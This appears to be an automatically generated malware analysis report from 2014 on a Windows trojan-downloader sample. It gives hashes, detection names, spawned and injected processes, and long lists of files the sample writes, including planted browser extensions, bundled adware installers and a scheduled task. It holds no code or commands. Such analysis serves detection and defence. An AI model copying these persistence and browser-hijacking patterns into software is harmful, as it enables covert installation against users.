Dropped.Trojan.Generic.8860750_0dda15c3b5

by malwarelabrobot on September 19th, 2014 in Malware Descriptions.

Dropped:Trojan.Generic.8860750 (B) (Emsisoft), Dropped:Trojan.Generic.8860750 (AdAware), Adware.Win32.Webalta.FD, Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, Trojan-Banker.Win32.Brasil.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Banker, Trojan, Installer, VirTool, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0dda15c3b539824d03443634931b0756
SHA1: dade5389732731f28eeac8b4d6e5e64f5ed68e9b
SHA256: eb1dd7a52d7fd8bb4876e5129064168efa595b3cfc8cb6972ef1c627f0547b09
SSDeep: 12288:OUWA3AheuswyYpUH X3Z3lgk9EsmoMZfZbYUrEiH191eznYE8Rd:OUWqistYWH03NlXEsmoMEoF191E8Rd
Size: 543694 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: nethfdrv
Created at: 2009-08-16 14:05:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Dropped creates the following process(es):

fm4.exe:260
Almanac_clnh_2014.8.3._126cl.exe:2900
AlmDay.exe:1016
assistupdate.exe:2660
setup_2948-140896.exe:1164
axult.exe:460
%original file name%.exe:264
FHSev.exe:2280
FHSev.exe:2212
FHSev.exe:968
AlmDayQuick.exe:2908
juese.exe:2488
sjss_jing_zhimeng_217.exe:1724
sjss.exe:216
a-zm-157391-v5.exe:2236
setup_2949-14598.exe:612
OfficeAssist.0195.80.1015.exe:1628
OfficeAssist.0195.80.1015.exe:448
fm4svr.exe:3608
axuls.exe:1160
ignite.exe:2880
ignite.exe:2764
AppleDTAssistant.exe:1856
regsvr32.exe:2112
regsvr32.exe:500
regsvr32.exe:2324
kindness.exe:2856
Application Dataypfbyfgmr.exe:2796
iApple.exe:1748
apples_5_1008.exe:816
tqrl_89_177560.exe:1644
xkcc_50091167828.exe:2196

The Dropped injects its code into the following process(es):

IFoxInstall-y-c203945859-run-s-x.exe:1360
AppleDesktop.exe:1952
FHSev.exe:2328
Application Dataypfbyfgmr.tmp:2860
fm4svr.exe:1392
fjwyusp.exe:1336
ignite.exe:2576
mankind.exe:2904
UUSEE_kb1003_Setup_133149.exe:3756

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process fm4.exe:260 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\stj[1].htm (3 bytes)
%Program Files%\FM4.0\201409180317\Data\client.ini (42 bytes)
%Program Files%\FM4.0\201409180317\Data\server.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\ver[1].txt (36 bytes)
%Program Files%\FM4.0\201409180317\Data\user2.ini (448 bytes)
%Program Files%\FM4.0\201409180317\SysConfig.ini (468 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\CAS12RG5.htm (3 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\stj[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\CAS12RG5.htm (0 bytes)

The process Almanac_clnh_2014.8.3._126cl.exe:2900 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Desktop\½ñÈÕ»ÆÀú.lnk (804 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menu_bg.png (119 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuselectbar.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe (267 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (6312 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Disconnect\disconnect.html (969 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menurmark.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\joke.png (7 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\bakground.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\z_stat[1].php (2068 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\right.png (1 bytes)
%System%\config\SOFTWARE.LOG (3043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\install[1].htm (174 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\soft.inf (26 bytes)
%Documents and Settings%\%current user%\Start Menu\³ÌÐò\½ñÈÕ»ÆÀú\ÅäÖÃ\жÔؽñÈÕ»ÆÀú.lnk (814 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Uninst.exe (96 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Disconnect\disconnect.jpg (20 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\config\TipsConfig.ini (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDayQuick.exe (98 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\bg_icon.png (969 bytes)
%Documents and Settings%\%current user%\Start Menu\³ÌÐò\½ñÈÕ»ÆÀú\½ñÈÕ»ÆÀú.lnk (808 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\½ñÈÕ»ÆÀú.lnk (774 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\data\data.bin (324 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuright.png (2 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (6452 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\close.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuseparator.png (935 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDayAuxiliary.dll (154 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\life.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\line.png (976 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\yun.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\game.png (2 bytes)
%System%\config\software (1615 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\close.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\set.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\small_bg.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\left.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\la_select.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\la_focus.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\min.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\bk.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\config\SearchConfig.ini (681 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\config\TitleConfig.ini (345 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\z_stat[1].php (0 bytes)

The process IFoxInstall-y-c203945859-run-s-x.exe:1360 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IFoxInfo.ini (178 bytes)

The process AlmDay.exe:1016 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (221 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (400 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (1348 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (400 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (332 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\soft.inf (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\rmsloaderdelayeddiv[2].js (549 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\search[1].htm (540 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[1].txt (694 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5820 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\ips1388[1].htm (388 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\cybercafe.conf (624 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\mnconf.conf (2 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Passport[1].htm (436 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\iplookup[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\rmsloaderdelayeddiv[1].js (205 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (1730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\WindowsLiveConnect_c[1].js (280 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\cybercafe.conf (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\mnconf.conf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\rmsloaderdelayeddiv[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)

The process assistupdate.exe:2660 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%WinDir%\Tasks\AssistantUpdateTask_adm.job (428 bytes)

The process setup_2948-140896.exe:1164 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\FM4.0\201409180317\avcodec-54.dll (23424 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\FM4.0.lnk (787 bytes)
%Program Files%\FM4.0\201409180317\Data\client.ini (36 bytes)
%Program Files%\FM4.0\201409180317\channels.xml (784 bytes)
%Program Files%\FM4.0\201409180317\Data\dh.ini (56 bytes)
%Program Files%\FM4.0\201409180317\FHSev.exe (11048 bytes)
%Program Files%\FM4.0\201409180317\SysConfig.ini (664 bytes)
%Program Files%\FM4.0\201409180317\libav.dll (6360 bytes)
%Program Files%\FM4.0\201409180317\source.dll (6584 bytes)
%Program Files%\FM4.0\201409180317\swresample-0.dll (3312 bytes)
%Program Files%\FM4.0\201409180317\pthreadGC2.dll (3616 bytes)
%Program Files%\FM4.0\201409180317\favorfm.xml (440 bytes)
%Program Files%\FM4.0\201409180317\DuiLib.dll (16288 bytes)
%Program Files%\FM4.0\201409180317\fm4svr.exe (23424 bytes)
%Program Files%\FM4.0\201409180317\avformat-54.dll (12088 bytes)
%Program Files%\FM4.0\201409180317\Data\version.ini (32 bytes)
%Program Files%\FM4.0\201409180317\Unins.exe (9608 bytes)
%Program Files%\FM4.0\201409180317\fm4.exe (63950 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\ÅäÖù¤¾ß\жÔØFM4.0.lnk (813 bytes)
%Program Files%\FM4.0\201409180317\avcore.dll (2392 bytes)
%Program Files%\FM4.0\201409180317\Data\setup.ini (124 bytes)
%Program Files%\FM4.0\201409180317\audio.dll (3616 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\¹Ù·½Ö÷Ò³.lnk (334 bytes)
%Program Files%\FM4.0\201409180317\Data\user2.ini (56 bytes)
%Program Files%\FM4.0\201409180317\avutil-52.dll (5520 bytes)

The process axult.exe:460 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\fjwyusp\hzsoft\UUSEE_kb1003_Setup_133149.exe (721630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\UUSEE_kb1003_Setup_133149[1].exe (783977 bytes)
%Program Files%\fjwyusp\hzsoft\setup_2949-14598.exe (689706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\setup_2949-14598[1].exe (752556 bytes)

The process %original file name%.exe:264 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\fjwyusp\fjwyusp.exe (23610 bytes)
%Program Files%\fjwyusp\rnr20.dll (3 bytes)

The Dropped deletes the following file(s):

%Program Files%\fjwyusp\__tmp_rar_sfx_access_check_467000 (0 bytes)

The process AppleDesktop.exe:1952 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleConfig.ini (527 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleData.add.bk (16 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleData.add.write_cache (16 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AIcoCache.dat (0 bytes)

The process FHSev.exe:2328 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\FM4.0\201409180317\Data\0317.Tmp (1268 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Update[1].rar (2052 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\fwtj[1].htm (3 bytes)

The Dropped deletes the following file(s):

%Program Files%\FM4.0\201409180317\Data\0317.Tmp (0 bytes)

The process AlmDayQuick.exe:2908 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Driver\Dragon.dat (9 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\config.ini (46 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\data.dat (388 bytes)

The process Application Dataypfbyfgmr.tmp:2860 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\_isetup\_RegDLL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\Tool.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\ISTask.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\_isetup\_shfoldr.dll (23 bytes)

The process juese.exe:2488 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\focus-img-button-png8[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1409112564312005[1].jpg (64625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\jstmbase[1].css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\wz-main-bg[1].jpg (33202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\jquery.base64[1].js (2365 bytes)
%Documents and Settings%\All Users\Start Menu\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\jquery.cookie.1.3.1[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\jstmbase[2].css (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\home-page-png8[1].png (8745 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\home-page[1].png (30010 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\jquery-1.10.2.min[1].js (58245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\1389683374154825[1].gif (2553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\1389682959213947[1].gif (2553 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\绝色唐门.lnk (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1409210600946002[1].jpg (65433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1389683394108438[1].gif (2553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\1389683211750106[1].gif (4473 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\is_Desktop[1].htm (1666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\jquery.slide[1].js (993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1389683070249849[1].gif (4014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\is_Desktop[1] (4263 bytes)
%Documents and Settings%\All Users\Desktop\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1406784233525194[1].jpg (77561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1.1.0.0a-zm-157391-v5[1].htm (930 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\jstmbase[1].css (0 bytes)

The process sjss_jing_zhimeng_217.exe:1724 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\sjss.exe (1837 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\2.png (13 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\速捷搜索\速捷搜索.lnk (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk (1428 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\Config.ini (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\uninstall.exe (267 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\速捷搜索.lnk (685 bytes)
%Documents and Settings%\All Users\Desktop\速捷搜索.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\SouSuo.zip (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\0.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\1.png (6 bytes)
%Documents and Settings%\All Users\Start Menu\速捷搜索.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\install_1410999409.tmp (301 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\速捷搜索\卸载速捷搜索.lnk (912 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\kbtongji[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\install_1410999409.tmp (0 bytes)

The process a-zm-157391-v5.exe:2236 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Program Files%\jstm\ptc (9 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\绝色唐门\卸载.lnk (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ext.7z (106408 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Almanac_clnh_2014.8.3._126cl.exe (1947589 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
